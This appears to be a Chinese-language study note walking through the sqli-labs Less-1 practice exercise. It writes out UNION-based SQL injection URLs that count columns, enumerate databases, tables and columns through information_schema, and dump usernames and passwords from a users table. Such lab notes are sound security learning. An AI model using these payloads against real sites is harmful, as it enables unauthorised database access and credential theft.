Less-1
利用'进行测试,后面跟or语句测试注入点,证明id字段可以注入
利用order by X 测试该表格几列数据,并测试第几列数据可以注入
爆库过程
-
库名
单独爆破
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,(select schema_name from information_schema.schemata limit 2,1),3--+
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,(select schema_name from information_schema.schemata limit 3,1),3--+
利用group_concat爆破
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,group_concat(schema_name),3 from information_schema.schemata--+limit 0,1
或者
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,(select group_concat(schema_name) from information_schema.schemata),3--+
-
表名
127.0.0.1/sqli-labs/Less-1/?id=-1'union select 1,(select%20group_concat(table_name)%20from%20information_schema.tables),3--+
-
表对应列名
(select group_concat(column_name) from information_schema.columns where table_name='users')
-
user中对应的password和user
(select group_concat(username)from users)
(select group_concat(password)from users)